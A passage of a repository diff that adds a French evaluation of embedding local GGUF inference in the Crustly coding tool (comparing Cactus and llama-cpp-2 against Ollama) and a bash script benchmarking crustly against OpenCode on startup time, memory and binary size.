+déjà démarré. C'est ce qui rend l'intégration `ollama-rs` relativement légère
+(voir `ollama-rs-integration-plan.md`, ~700 lignes de plan pour un client HTTP
+typé) : aucun code d'inférence, juste du mapping requête/réponse.
+
+L'idée évaluée ici est différente en nature : **faire tourner l'inférence
+dans le process Crustly lui-même**, en lisant un fichier `.gguf` directement
+depuis le disque, sans dépendre d'Ollama (ni d'aucun autre serveur externe)
+étant démarré au préalable. Objectif déclaré : une distribution plus
+monolithique (un seul binaire, une seule installation, pas de service tiers à
+gérer).
+
+---
+
+## 2. Ce qu'implique réellement "charger un GGUF sans Ollama"
+
+Le format GGUF est un conteneur binaire (métadonnées + tenseurs quantifiés).
+Le "lire" ne suffit pas : il faut aussi **exécuter** le modèle, ce qui
+nécessite un moteur d'inférence complet :
+
+- désérialisation GGUF (métadonnées, vocabulaire, tenseurs)
+- dé-quantization / kernels de calcul (matmul, attention) pour chaque format
+  de quantization supporté (Q4_K_M, Q5_K_S, Q8_0, …)
+- gestion du KV-cache et de la fenêtre de contexte
+- backends d'exécution (CPU SIMD — AVX2/NEON —, et idéalement GPU — CUDA,
+  Metal, Vulkan — pour des débits utilisables)
+- tokenizer(s) compatibles (BPE, SentencePiece, selon la famille de modèle)
+- gestion mémoire (mmap du fichier modèle, allocation du KV-cache)
+
+C'est un sous-système d'une toute autre échelle que celui écrit pour
+`ollama.rs` (client HTTP typé). Concrètement, cela revient à embarquer
+l'équivalent de **llama.cpp** (ou un moteur propriétaire qui en tient lieu)
+dans le binaire de Crustly. Aucun projet sérieux dans cet espace ne réécrit ce
+moteur en Rust pur pour cet usage — l'écosystème mûr (`llama.cpp`, `candle`,
+`mistral.rs`) s'appuie soit sur du C++/CUDA existant via FFI, soit sur des
+kernels dédiés très lourds à maintenir.
+
+---
+
+## 3. Analyse de `cactus-compute/cactus`
+
+### 3.1 Nature du projet
+
+Cactus est un moteur d'inférence "hybride edge-cloud", **conçu pour mobile et
+wearables** ("Tiny AI for tiny devices") : iOS, Android, macOS, iPad, Vision
+Pro. Il expose des bindings Swift, Kotlin, Flutter, React Native, Python,
+Rust, C/C++, avec une API façon OpenAI (`cactus_init`, `cactus_complete`) et
+un mode serveur (`cactus serve`, HTTP compatible OpenAI). Projet actif et
+soutenu (Y Combinator, ~5.5k ★, releases régulières jusqu'à v2.0.1 début
+juillet 2026).
+
+### 3.2 Moteur d'inférence : plus du tout basé sur llama.cpp/GGUF
+
+Point le plus important pour cette évaluation : **la v1 de Cactus a
+abandonné GGUF pour un format propriétaire**, dans un objectif de
+performance sur device mobile :
+
+- `cactus-graph` : graphe de calcul "zero-copy"
+- `cactus-kernels` : kernels SIMD ARM NEON écrits sur mesure par appareil
+- `cactus-quants` : quantization "par rotation" maison, 1 à 4 bits (CQ2, CQ3,
+  CQ2.54, CQ3.26, CQ4)
+
+Le flux normal est `cactus convert <modèle HuggingFace>` → bundle Cactus
+propriétaire (poids quantifiés + graphe d'exécution), ou `cactus download`
+pour récupérer un bundle déjà converti. La documentation/marketing continue
+d'affirmer que "tout modèle GGUF sur HuggingFace" est supporté "via
+migration", mais cela décrit une **conversion vers le format propriétaire**,
+pas un chargement natif d'un `.gguf` existant tel quel — ce qui ne correspond
+pas à l'objectif "lire directement un fichier `.gguf`" évalué ici. Les
+sources publiques sur ce point sont partiellement contradictoires (pages
+marketing vs. documentation technique) ; à re-vérifier auprès du mainteneur
+avant toute décision si cette piste était malgré tout retenue.
+
+**Conséquence directe** : intégrer Cactus n'apporte pas "charger un `.gguf`
+sans conversion" — il faudrait de toute façon une étape de conversion
+propriétaire, comparable en complexité opérationnelle à `ollama pull`
+aujourd'hui, mais avec un outil et un format supplémentaires à maintenir.
+
+### 3.3 Licence — blocage principal
+
+Licence custom "Cactus Compute, Inc." (ni MIT/Apache, ni copyleft
+classique — source-available à conditions commerciales) :
+
+- Gratuit pour : particuliers (usage personnel/éducatif/recherche/non
+  commercial), établissements d'enseignement, associations 501(c)(3), et
+  organisations dont le **financement total < 2 M USD ET le chiffre
+  d'affaires annuel brut < 2 M USD** (les deux conditions, cumulatives).
+- **Résiliation automatique** : si une organisation qui remplissait ces
+  critères dépasse l'un des deux seuils, l'autorisation s'arrête
+  immédiatement et une licence commerciale doit être obtenue sous 30 jours.
+- Toute entité hors de ces catégories (y compris dès le départ) doit obtenir
+  une licence commerciale séparée.
+
+**Pourquoi c'est bloquant pour Crustly spécifiquement** : Crustly est
+lui-même distribué sous FSL-1.1-MIT (Functional Source License) — un modèle
+de licence "à conditions" mais qui reste librement utilisable/redistribuable
+dès aujourd'hui, et qui redevient MIT pur après 2 ans par version. Crustly ne
+contrôle pas qui télécharge/recompile/redistribue son binaire ni la taille de
+l'organisation de chaque utilisateur final. Embarquer une dépendance dont la
+licence dépend de la taille financière de *l'utilisateur final de Crustly*
+(pas de Crustly lui-même) transfère une contrainte de conformité
+imprévisible et non vérifiable à toute la chaîne de distribution — un risque
+qu'un outil dev "cargo install"-able / packagé (Homebrew, binaires GitHub
+Releases, etc.) ne peut pas absorber proprement sans segmenter sa
+distribution (build "avec Cactus" réservé à certains utilisateurs vs. build
+public sans). C'est une complexité de packaging et un risque juridique que le
+gain fonctionnel ne justifie pas.
+
+### 3.4 Bindings Rust et intégration technique
+
+- `bindings/rust/` ne contient que `cactus.rs` (un fichier unique avec
+  attributs `#[link(...)]`) + un README expliquant de le copier dans son
+  projet et de pointer `build.rs` vers le répertoire de build de la
+  bibliothèque native précompilée. **Pas de crate publié sur crates.io.**
+- La bibliothèque native (`cactus-engine`) doit être compilée/liée par
+  plateforme cible (toolchain CMake/Xcode/NDK selon iOS/Android/macOS) —
+  aucune garantie de portabilité "out of the box" vers Linux x86_64/Windows,
+  les plateformes desktop réellement ciblées par Crustly (`cargo build`,
+  `cargo build --release` sans dépendance externe, tel que documenté dans
+  `CLAUDE.md`).
+- API exposée : `cactus_init`, `cactus_complete`, fonctions de streaming
+  transcription — orientée mobile-app-embarquée, pas serveur/CLI desktop.
+
+### 3.5 Maturité et stabilité d'API
+
+Projet actif, mais le changement de format de modèle entre versions majeures
+(GGUF → propriétaire à la v1, refonte "complète" du moteur d'inférence selon
+les notes de version) signale une **API/format encore mouvants** — un risque
+de maintenance supplémentaire si Crustly devait suivre ces changements.
+
+---
+
+## 4. Alternative techniquement alignée : `llama-cpp-2` (bindings Rust vers llama.cpp)
+
+Si l'objectif reste "lire un `.gguf` sans conversion, sans serveur externe",
+la voie correcte est un binding Rust direct vers **llama.cpp**, la
+implémentation de référence du format GGUF :
+
+| Critère | `llama-cpp-2` / `llama_cpp` (crates.io) | Cactus |
+|---|---|---|
+| Lit un `.gguf` existant sans conversion | ✅ natif | ❌ conversion requise |
+| Licence | MIT (llama.cpp) — compatible FSL-1.1-MIT | ❌ propriétaire, seuils financiers |
+| Publié sur crates.io | ✅ | ❌ (copier-coller de fichier) |
+| Backends | CPU (AVX2/NEON), CUDA, Metal, Vulkan | ARM NEON / Metal (mobile-first) |
+| Cible plateforme | Linux/macOS/Windows desktop — aligné Crustly | iOS/Android/mobile-first |
+| Maturité écosystème | Très large (des dizaines de milliers de projets s'appuient sur llama.cpp) | Plus jeune, API en mouvement |
+
+Ce chemin est **faisable**, mais reste un projet d'ampleur nettement
+supérieure à l'intégration `ollama-rs` existante, pour les raisons du §5.
+
+---
+
+## 5. Bénéfices réels d'un chargement GGUF natif (indépendamment du fournisseur)
+
+1. **Zéro dépendance de service externe** : plus besoin qu'Ollama tourne en
+   arrière-plan ; un utilisateur avec juste un fichier `.gguf` sur disque
+   peut lancer Crustly directement.
+2. **Distribution monolithique** : un seul binaire à installer (au prix d'une
+   taille de binaire nettement plus grande, voir §6).
+3. **Contrôle fin du cycle de vie du modèle** dans le process Crustly
+   (chargement, déchargement, paramètres d'inférence) sans passer par l'API
+   HTTP d'un tiers.
+4. **Latence de démarrage** potentiellement meilleure pour un usage
+   ponctuel/CLI (pas de round-trip HTTP, pas de "cold start" du service
+   Ollama) — à mesurer, pas garanti (le chargement mmap d'un gros `.gguf`
+   reste coûteux dans tous les cas).
+
+Bénéfices **non obtenus** par rapport à Ollama tel qu'utilisé aujourd'hui :
+
+- **Partage de modèle entre plusieurs process** : Ollama charge un modèle une
+  fois et sert plusieurs clients (Crustly + autre outil) depuis le même
+  processus ; un moteur embarqué dans Crustly rechargerait le modèle à
+  chaque instance de Crustly lancée (RAM et temps de démarrage multipliés
+  par le nombre de sessions concurrentes).
+- **Gestion de catalogue/téléchargement de modèles** (`ollama pull
+  <nom:tag>`, déjà exposé dans Crustly via `crustly ollama pull` et le
+  dialog TUI `Ctrl+D`, cf. `ollama-rs-integration-plan.md` §5.7) : avec un
+  fichier `.gguf` brut, cette responsabilité (trouver, télécharger, vérifier
+  l'intégrité du fichier) reviendrait entièrement à Crustly.
+- **Déchargement automatique par inactivité** (`keep_alive` d'Ollama) —
+  géré aujourd'hui par le daemon, à réimplémenter côté Crustly.
+
+---
+
+## 6. Coûts d'une intégration native (`llama-cpp-2` ou équivalent)
+
+### 6.1 Build et packaging
+
+- Compilation C++/CUDA/Metal de llama.cpp à intégrer au pipeline
+  `cargo build` (via `cmake`/`bindgen`), ou distribution de binaires
+  précompilés par plateforme+backend (Linux CPU, Linux CUDA, macOS Metal,
+  Windows CPU, Windows CUDA, …) — matrice de build significativement plus
+  large que celle actuelle (`cargo build`/`cargo build --release`, aucune
+  toolchain externe requise aujourd'hui).
+- Temps de compilation à froid fortement augmenté (compilation C++ native en
+  plus du Rust).
+- Taille du binaire final en forte hausse (moteur natif + éventuels kernels
+  CUDA embarqués), sans compter le poids des fichiers `.gguf` eux-mêmes
+  (plusieurs GB par modèle, à gérer côté disque quel que soit le mécanisme
+  de chargement).
+
+### 6.2 Nouveau code applicatif
+
+- Nouveau provider `src/llm/provider/gguf.rs` (ou équivalent) implémentant le
+  trait `Provider` existant (`src/llm/provider/trait.rs`, lignes 18-65) :
+  `complete()`, `stream()`, mapping vers
+  `LLMRequest`/`LLMResponse`/`StreamEvent`. Câblage dans `factory.rs` sur le
+  même modèle que `try_create_ollama()`.
+- **Écart de schéma de configuration à combler** : `ProviderConfig`
+  générique (`src/config/mod.rs` ligne 346) ne connaît qu'un
+  `default_model: String` (un nom résolu par un serveur distant), jamais un
+  chemin de fichier. Aucun champ existant pour un chemin `.gguf`, un niveau
+  de quantization, un nombre de threads CPU, ou un nombre de couches
+  déportées sur GPU (`n_gpu_layers`) — il faudrait un nouveau
+  `GgufProviderConfig` sur le modèle de `QwenProviderConfig` (ligne 366, déjà
+  le précédent le plus proche pour un déploiement "local" avec réglages bas
+  niveau) ou d'`OllamaModelConfig` (ligne 499, réglages par modèle).
+- **Contrairement à `ollama.rs`, ce provider doit aussi gérer** :
+  découverte et validation des fichiers `.gguf` locaux, chargement/
+  déchargement en mémoire (mmap), paramètres d'inférence bas niveau (taille
+  du contexte, threads CPU, offload GPU partiel/total), tokenizer embarqué,
+  et — point sensible — le **tool/function calling**, qu'Ollama gère
+  aujourd'hui côté serveur (avec, déjà, une hétérogénéité notable côté
+  Crustly : `ollama.rs` lignes 607-655 contient une heuristique de secours
+  — `maybe_tool_call_json`/`tool_call_from_content` — qui détecte un tool
+  call imprimé en JSON brut dans le flux de texte quand le template du
+  modèle ne peuple pas le champ natif `tool_calls`, et `qwen.rs` a son
+  propre `ToolCallParser` pour les formats "hermes"/"openai"). Un moteur
+  GGUF brut, exécutant des modèles open-weight arbitraires, aura le même
+  besoin de parsing de secours — indépendant du transport (daemon Ollama vs.
+  moteur en process), donc ce n'est pas un coût nouveau propre à
+  l'intégration native, mais confirme que le "vrai" travail de
+  tool-calling reste à faire même après avoir résolu le chargement du
+  `.gguf`.
+- Gestion mémoire/concurrence : un modèle chargé dans le process Crustly
+  occupe la RAM pendant toute la durée de vie de l'app (ou nécessite une
+  logique de déchargement maison) ; à coordonner avec le reste de
+  l'application (TUI, DB, tools) qui tourne dans le même process — risque de
+  pression mémoire ou de blocage du thread si l'inférence CPU n'est pas
+  correctement isolée dans une tâche `tokio::task::spawn_blocking`.
+- **Précédent de feature flag à suivre** : `ollama = ["dep:ollama-rs",
+  "dep:schemars"]` dans `Cargo.toml`, gaté de façon cohérente dans
+  `src/llm/provider/mod.rs` (`#[cfg(feature = "ollama")]`) et `factory.rs`
+  (y compris un stub no-op quand la feature est désactivée). Une nouvelle
+  feature `gguf`/`local-inference` suivrait exactement ce patron et
+  s'ajouterait à `all-llm`.
+- **Crabrace n'a pas de rôle ici** : le registre `crabrace.rs` modélise des
+  providers *joignables sur le réseau* (API cloud ou daemon local avec
+  surface HTTP) ; un moteur GGUF en process n'a pas de tel point d'entrée à
+  enregistrer — il contournerait Crabrace entièrement, comme le fait déjà
+  `QwenProvider` pour ses aspects spécifiques.
+
+### 6.3 Maintenance long terme
+
+- Nouvelle surface de sécurité : parsing de fichiers binaires tiers
+  (`.gguf`) fournis par l'utilisateur, exécution de code natif C++ dans le
+  process — à contraster avec le modèle actuel où Ollama tourne en process
+  séparé (isolation naturelle des crashs/fuites mémoire du moteur
+  d'inférence).
+- Suivi des mises à jour de sécurité/performance de llama.cpp (dépendance
+  externe C++ à vendorer/mettre à jour manuellement, hors de l'écosystème
+  `cargo update`).
+- Tests CI : nécessite des runners avec un vrai modèle `.gguf` téléchargé
+  (même problème que documenté pour Ollama en §7 du plan d'intégration
+  `ollama-rs` — "test manuel local, non exécutable en CI" — mais en pire, car
+  il n'y a même plus de serveur à mocker/stubber facilement : c'est le moteur
+  d'inférence lui-même qu'il faudrait invoquer).
+
+### 6.4 Estimation d'effort (ordre de grandeur)
+
+À titre de comparaison, l'intégration `ollama-rs` (client HTTP typé,
+documentée dans `ollama-rs-integration-plan.md`) a représenté 4 phases livrées
+progressivement. Un provider GGUF natif via `llama-cpp-2` couvre un
+périmètre fonctionnel comparable **plus** un moteur d'inférence embarqué :
+raisonnablement, **plusieurs semaines** de travail pour un MVP correct
+(chargement modèle, complétion, streaming, tool-calling basique), contre
+quelques jours pour un client HTTP vers un serveur déjà bâti et testé par une
+communauté large (Ollama). Le rapport effort/bénéfice n'est positif que si
+l'objectif "zéro dépendance de service externe" est une exigence dure (ex.
+distribution air-gapped, contrainte produit explicite) — pas une simple
+préférence de simplicité perçue.
+
+---
+
+## 7. Tableau de synthèse
+
+| Option | Charge un `.gguf` sans conversion | Licence compatible | Effort | Recommandation |
+|---|---|---|---|---|
+| **Statu quo** (Ollama natif + compat OpenAI) | Non (délégué à Ollama) | ✅ | — | ✅ Conserver |
+| **Cactus** (`cactus-compute/cactus`) | ❌ conversion propriétaire requise | ❌ seuils financiers, résiliation auto | Moyen-élevé (FFI + toolchain native par plateforme) | ❌ Ne pas intégrer |
+| **`llama-cpp-2`** (bindings vers llama.cpp) | ✅ | ✅ MIT | Élevé (moteur natif embarqué) | ⚠️ Envisageable en ADR séparée + spike, seulement si "zéro dépendance externe" devient une exigence produit explicite |
+
+---
+
+## 8. Questions ouvertes avant toute décision
+
+1. Le besoin "monolithique, pas de service externe" est-il une **contrainte
+   produit ferme** (ex. usage air-gapped, distribution à des utilisateurs
+   sans droits d'installation de service tiers) ou une **préférence de
+   confort** ? La réponse change complètement le calcul coût/bénéfice du §6.
+2. Si retenu, quel périmètre de backends est requis au lancement : CPU
+   seulement (plus simple, plus lent) ou CPU+GPU (CUDA/Metal, complexité de
+   build multipliée) ?
+3. Le tool/function calling (utilisé massivement par les 21+ tools de
+   Crustly) est-il requis dès le MVP GGUF natif, ou une première version
+   "chat simple, pas de tools" est-elle acceptable pour valider l'intérêt
+   avant d'investir dans le parsing de tool calls sur un moteur brut ?
+4. Faut-il reconsidérer **Cactus spécifiquement** si l'équipe Cactus confirme
+   un chargement GGUF natif (sans conversion) dans une version future, et
+   clarifie une licence permissive pour usage embarqué en outil dev
+   redistribué publiquement ? (à re-vérifier périodiquement, pas d'action
+   immédiate).
+
+---
+
+## 9. Suite à donner
+
+Ce document est un **plan d'évaluation**, pas une décision. Si une direction
+est retenue à l'issue des questions du §8 :
+
+- **Aucune décision** (statu quo) → rien à faire, ce document reste comme
+  trace de l'évaluation.
+- **Décision d'intégrer un moteur GGUF natif** (`llama-cpp-2` ou équivalent)
+  → documenter le choix dans une ADR dédiée
+  `docs/architecture/decisions/0005-<titre>.md` (Context/Decision/
+  Consequences, cf. gabarit `0000-adr-template.md`), qui renverra vers ce
+  fichier pour le détail — même articulation que l'ADR `0003` vers
+  `docs/guides/CRABRACE_INTEGRATION.md`. Le détail d'implémentation
+  suivrait ensuite le même triptyque que l'intégration Ollama :
+  plan d'intégration (ce document en tient lieu) → plan de test → guide
+  utilisateur (`docs/guides/`), sur le modèle de
+  `ollama-rs-integration-plan.md` + `ollama-local-llm-test-plan.md` +
+  `docs/guides/OLLAMA_GUIDE.md`.
+
+---
+
+## Sources consultées
+
+- [cactus-compute/cactus](https://github.com/cactus-compute/cactus) — README, structure du repo, bindings Rust
+- [cactuscompute.com/docs](https://docs.cactuscompute.com/v2.0.1/) — documentation produit
+- Licence Cactus Compute, Inc. (fichier `LICENSE` du dépôt)
+- `ollama-rs-integration-plan.md` (ce dépôt) — référence de comparaison d'effort
+- `docs/architecture/decisions/0003-crabrace-provider-registry.md` — architecture de découverte de providers existante
+- `src/llm/provider/trait.rs`, `Cargo.toml` (ce dépôt) — interface `Provider` et conventions de feature flags actuelles
+- Recherche web sur `llama-cpp-2`/`llama_cpp` (crates.io) comme alternative

--- a/scripts/benchmark-vs-opencode.sh
+++ b/scripts/benchmark-vs-opencode.sh
@@ -1,0 +1,306 @@
+#!/usr/bin/env bash
+# Reproducible resource-footprint benchmark: crustly vs OpenCode.
+#
+# Measures cold-start time, resident memory (RSS), and installed binary
+# size for both tools on the SAME machine, and writes a Markdown report.
+# See differentiation-strategy-vs-opencode.md §5 for the methodology
+# rationale (why these three metrics, why raw numbers get published even
+# when unfavorable, why this must stay independently re-runnable).
+#
+# This script never fabricates a number: if a tool or binary can't be
+# found, its column is marked "not measured" in the report instead of
+# being guessed at or omitted silently.
+#
+# Usage:
+#   scripts/benchmark-vs-opencode.sh [OPTIONS]
+#
+# Options:
+#   --crustly-bin PATH    Path to a crustly binary. Default: build
+#                          target/release/crustly via `cargo build --release`
+#                          if it doesn't already exist.
+#   --opencode-bin PATH   Path to an opencode binary. Default: `opencode`
+#                          resolved from PATH. If not found, OpenCode is
+#                          skipped (not faked) and the report says so.
+#   --runs N              Number of timed runs per tool (default: 10).
+#   --output FILE          Markdown report path. Default:
+#                          benchmarks/results/<timestamp>-<hostname>.md
+#   -h, --help             Show this help.
+#
+# Requires: bash, awk, cargo (only if building crustly). Recommended but
+# optional: hyperfine (https://github.com/sharkdp/hyperfine) for precise
+# cold-start timing - falls back to a manual timing loop if absent.
+# RSS measurement uses `/usr/bin/time -v` (GNU time) when available,
+# falling back to /proc/<pid>/status polling on Linux. Neither is
+# available on macOS by default (BSD `time` has no -v) - the report says
+# so explicitly rather than printing a wrong number.
+
+set -euo pipefail
+
+REPO_ROOT="$(cd "$(dirname "${BASH_SOURCE[0]}")/.." && pwd)"
+cd "$REPO_ROOT"
+
+RUNS=10
+CRUSTLY_BIN=""
+OPENCODE_BIN=""
+OUTPUT=""
+
+usage() {
+  sed -n '2,33p' "${BASH_SOURCE[0]}" | sed 's/^# \{0,1\}//'
+}
+
+while [ $# -gt 0 ]; do
+  case "$1" in
+    --crustly-bin) CRUSTLY_BIN="$2"; shift 2 ;;
+    --opencode-bin) OPENCODE_BIN="$2"; shift 2 ;;
+    --runs) RUNS="$2"; shift 2 ;;
+    --output) OUTPUT="$2"; shift 2 ;;
+    -h|--help) usage; exit 0 ;;
+    *) echo "[benchmark] unknown argument: $1" >&2; usage; exit 1 ;;
+  esac
+done
+
+TIMESTAMP="$(date -u +%Y%m%dT%H%M%SZ)"
+HOSTNAME_SAFE="$(hostname 2>/dev/null | tr -c 'A-Za-z0-9_.-' '_' || echo unknown-host)"
+if [ -z "$OUTPUT" ]; then
+  mkdir -p benchmarks/results
+  OUTPUT="benchmarks/results/${TIMESTAMP}-${HOSTNAME_SAFE}.md"
+fi
+
+log() { echo "[benchmark] $*" >&2; }
+
+# ── Resolve binaries ─────────────────────────────────────────────────────
+
+if [ -z "$CRUSTLY_BIN" ]; then
+  if [ -x target/release/crustly ]; then
+    CRUSTLY_BIN="target/release/crustly"
+  else
+    log "no crustly release binary found - building (cargo build --release)"
+    cargo build --release
+    CRUSTLY_BIN="target/release/crustly"
+  fi
+fi
+if [ ! -x "$CRUSTLY_BIN" ]; then
+  log "crustly binary not found or not executable: $CRUSTLY_BIN"
+  exit 1
+fi
+CRUSTLY_BIN="$(cd "$(dirname "$CRUSTLY_BIN")" && pwd)/$(basename "$CRUSTLY_BIN")"
+log "crustly binary: $CRUSTLY_BIN"
+
+OPENCODE_AVAILABLE=1
+if [ -z "$OPENCODE_BIN" ]; then
+  if command -v opencode >/dev/null 2>&1; then
+    OPENCODE_BIN="$(command -v opencode)"
+  else
+    OPENCODE_AVAILABLE=0
+    log "opencode not found on PATH and --opencode-bin not given - OpenCode columns will be marked 'not measured', not faked"
+  fi
+fi
+if [ "$OPENCODE_AVAILABLE" -eq 1 ]; then
+  log "opencode binary: $OPENCODE_BIN"
+fi
+
+HAVE_HYPERFINE=0
+command -v hyperfine >/dev/null 2>&1 && HAVE_HYPERFINE=1
+
+# GNU time supports -v (Maximum resident set size); BSD/macOS time does not.
+HAVE_GNU_TIME=0
+if command -v /usr/bin/time >/dev/null 2>&1 && /usr/bin/time -v true >/dev/null 2>&1; then
+  HAVE_GNU_TIME=1
+fi
+
+OS_NAME="$(uname -s)"
+
+# ── Cold-start timing ────────────────────────────────────────────────────
+# Runs `<bin> --version` N times and reports mean/min/max wall-clock time
+# in milliseconds. `--version` is used (rather than `--help`) because it
+# exits immediately after minimal initialization on both tools, isolating
+# process/runtime startup cost from any argument-parsing work.
+
+manual_timing_loop() {
+  local bin="$1" arg="$2" runs="$3"
+  local times=()
+  for _ in $(seq 1 "$runs"); do
+    local start end
+    start="$(date +%s%N)"
+    "$bin" "$arg" >/dev/null 2>&1 || true
+    end="$(date +%s%N)"
+    times+=("$(( (end - start) / 1000000 ))")
+  done
+  printf '%s\n' "${times[@]}" | awk '
+    { sum += $1; if (NR==1 || $1 < min) min = $1; if ($1 > max) max = $1; n++ }
+    END { printf "mean=%.1f min=%d max=%d n=%d\n", sum/n, min, max, n }
+  '
+}
+
+hyperfine_timing() {
+  local bin="$1" arg="$2" runs="$3"
+  local json
+  json="$(mktemp)"
+  hyperfine --warmup 2 --runs "$runs" --export-json "$json" -- "$bin $arg" >/dev/null 2>&1
+  # hyperfine reports seconds; convert to ms for consistency with the manual path.
+  awk -v RS='"mean":|"min":|"max":' 'NR>1{print}' "$json" >/dev/null 2>&1 || true
+  python3 - "$json" <<'PYEOF' 2>/dev/null || {
+import json, sys
+d = json.load(open(sys.argv[1]))["results"][0]
+print(f"mean={d['mean']*1000:.1f} min={d['min']*1000:.0f} max={d['max']*1000:.0f} n={len(d['times'])}")
+PYEOF
+    # Fallback if python3 is unavailable: fall back to the manual loop instead.
+    manual_timing_loop "$bin" "$arg" "$runs"
+  }
+  rm -f "$json"
+}
+
+time_cold_start() {
+  local bin="$1" arg="$2" runs="$3"
+  if [ "$HAVE_HYPERFINE" -eq 1 ]; then
+    hyperfine_timing "$bin" "$arg" "$runs"
+  else
+    manual_timing_loop "$bin" "$arg" "$runs"
+  fi
+}
+
+# ── Peak RSS ──────────────────────────────────────────────────────────────
+
+measure_rss_gnu_time() {
+  local bin="$1" arg="$2"
+  local out
+  out="$(/usr/bin/time -v "$bin" "$arg" 2>&1 >/dev/null || true)"
+  echo "$out" | awk -F': ' '/Maximum resident set size/ {print $2}'
+}
+
+measure_rss_proc_poll() {
+  local bin="$1" arg="$2"
+  [ "$OS_NAME" = "Linux" ] || { echo ""; return; }
+  "$bin" "$arg" &
+  local pid=$!
+  local peak=0
+  while kill -0 "$pid" 2>/dev/null; do
+    if [ -r "/proc/$pid/status" ]; then
+      local rss
+      rss="$(awk '/VmRSS/ {print $2}' "/proc/$pid/status" 2>/dev/null || echo 0)"
+      [ -n "$rss" ] && [ "$rss" -gt "$peak" ] 2>/dev/null && peak="$rss"
+    fi
+    sleep 0.01
+  done
+  wait "$pid" 2>/dev/null || true
+  echo "$peak"
+}
+
+measure_rss_kib() {
+  local bin="$1" arg="$2"
+  if [ "$HAVE_GNU_TIME" -eq 1 ]; then
+    measure_rss_gnu_time "$bin" "$arg"
+  elif [ "$OS_NAME" = "Linux" ]; then
+    measure_rss_proc_poll "$bin" "$arg"
+  else
+    echo ""
+  fi
+}
+
+# ── Binary size ───────────────────────────────────────────────────────────
+
+file_size_bytes() {
+  local path="$1"
+  if [ "$OS_NAME" = "Darwin" ]; then
+    stat -f%z "$path"
+  else
+    stat -c%s "$path"
+  fi
+}
+
+human_kib() {
+  awk -v b="$1" 'BEGIN { if (b == "" ) { print "n/a" } else { printf "%.1f MiB", b/1024 } }'
+}
+
+# ── Run measurements ─────────────────────────────────────────────────────
+
+log "timing crustly cold start ($RUNS runs)..."
+CRUSTLY_TIME="$(time_cold_start "$CRUSTLY_BIN" "--version" "$RUNS")"
+log "crustly: $CRUSTLY_TIME"
+
+log "measuring crustly peak RSS..."
+CRUSTLY_RSS="$(measure_rss_kib "$CRUSTLY_BIN" "--version")"
+
+CRUSTLY_SIZE_BYTES="$(file_size_bytes "$CRUSTLY_BIN")"
+
+if [ "$OPENCODE_AVAILABLE" -eq 1 ]; then
+  log "timing opencode cold start ($RUNS runs)..."
+  OPENCODE_TIME="$(time_cold_start "$OPENCODE_BIN" "--version" "$RUNS")"
+  log "opencode: $OPENCODE_TIME"
+
+  log "measuring opencode peak RSS..."
+  OPENCODE_RSS="$(measure_rss_kib "$OPENCODE_BIN" "--version")"
+
+  OPENCODE_SIZE_BYTES="$(file_size_bytes "$OPENCODE_BIN")"
+else
+  OPENCODE_TIME="not measured (opencode not found)"
+  OPENCODE_RSS=""
+  OPENCODE_SIZE_BYTES=""
+fi
+
+# ── Report ────────────────────────────────────────────────────────────────
+
+extract_field() { echo "$1" | grep -o "$2=[0-9.]*" | cut -d= -f2; }
+
+{
+  echo "# Benchmark: crustly vs OpenCode"
+  echo
+  echo "Generated: $(date -u +%Y-%m-%dT%H:%M:%SZ)"
+  echo "Host: $(hostname 2>/dev/null || echo unknown) ($OS_NAME, $(uname -m))"
+  echo "Methodology: differentiation-strategy-vs-opencode.md §5"
+  echo "Runs per tool: $RUNS"
+  echo "Timing tool: $([ "$HAVE_HYPERFINE" -eq 1 ] && echo hyperfine || echo 'manual loop (hyperfine not installed)')"
+  echo "RSS tool: $([ "$HAVE_GNU_TIME" -eq 1 ] && echo '/usr/bin/time -v' || ([ "$OS_NAME" = "Linux" ] && echo '/proc polling (approximate)' || echo 'not available on this OS'))"
+  echo
+  echo "## Cold start (\`--version\`, wall-clock ms)"
+  echo
+  echo "| Tool | Mean | Min | Max |"
+  echo "|---|---|---|---|"
+  echo "| crustly | $(extract_field "$CRUSTLY_TIME" mean) | $(extract_field "$CRUSTLY_TIME" min) | $(extract_field "$CRUSTLY_TIME" max) |"
+  if [ "$OPENCODE_AVAILABLE" -eq 1 ]; then
+    echo "| opencode | $(extract_field "$OPENCODE_TIME" mean) | $(extract_field "$OPENCODE_TIME" min) | $(extract_field "$OPENCODE_TIME" max) |"
+  else
+    echo "| opencode | not measured | not measured | not measured |"
+  fi
+  echo
+  echo "## Peak resident memory (RSS)"
+  echo
+  echo "| Tool | Peak RSS |"
+  echo "|---|---|"
+  echo "| crustly | $([ -n "$CRUSTLY_RSS" ] && echo "${CRUSTLY_RSS} KiB ($(human_kib "$CRUSTLY_RSS"))" || echo "not available on this OS") |"
+  if [ "$OPENCODE_AVAILABLE" -eq 1 ]; then
+    echo "| opencode | $([ -n "$OPENCODE_RSS" ] && echo "${OPENCODE_RSS} KiB ($(human_kib "$OPENCODE_RSS"))" || echo "not available on this OS") |"
+  else
+    echo "| opencode | not measured |"
+  fi
+  echo
+  echo "> **Note:** OpenCode's real-world footprint in normal use includes its"
+  echo "> background Hono server process, not just the CLI invocation measured"
+  echo "> here. A single \`--version\` call may not start that server. Anyone"
+  echo "> re-running this benchmark for a public comparison should additionally"
+  echo "> measure RSS during an actual interactive session for both tools, not"
+  echo "> only at the \`--version\` cold-start point measured by this script."
+  echo
+  echo "## Binary size"
+  echo
+  echo "| Tool | Path | Size |"
+  echo "|---|---|---|"
+  echo "| crustly | \`$CRUSTLY_BIN\` | $(human_kib "$CRUSTLY_SIZE_BYTES") ($CRUSTLY_SIZE_BYTES bytes) |"
+  if [ "$OPENCODE_AVAILABLE" -eq 1 ]; then
+    echo "| opencode | \`$OPENCODE_BIN\` | $(human_kib "$OPENCODE_SIZE_BYTES") ($OPENCODE_SIZE_BYTES bytes) |"
+  else
+    echo "| opencode | — | not measured |"
+  fi
+  echo
+  echo "---"
+  echo
+  echo "Raw numbers only - no interpretation is added by this script. See"
+  echo "\`differentiation-strategy-vs-opencode.md\` §5-6 before publishing any"
+  echo "of this externally: publish unfavorable results too, and re-run"
+  echo "periodically since both tools evolve."
+} > "$OUTPUT"
+
+log "report written to $OUTPUT"
+if [ "$OPENCODE_AVAILABLE" -eq 0 ]; then
+  log "install opencode (see https://opencode.ai) and re-run with --opencode-bin, or ensure it's on PATH, to get a real comparison instead of a crustly-only report"
+fi

--- a/scripts/benchmark-vs-opencode.sh
+++ b/scripts/benchmark-vs-opencode.sh
@@ -171,7 +171,7 @@ measure_rss_gnu_time() {
 measure_rss_proc_poll() {
   local bin="$1" arg="$2"
   [ "$OS_NAME" = "Linux" ] || { echo ""; return; }
-  "$bin" "$arg" &
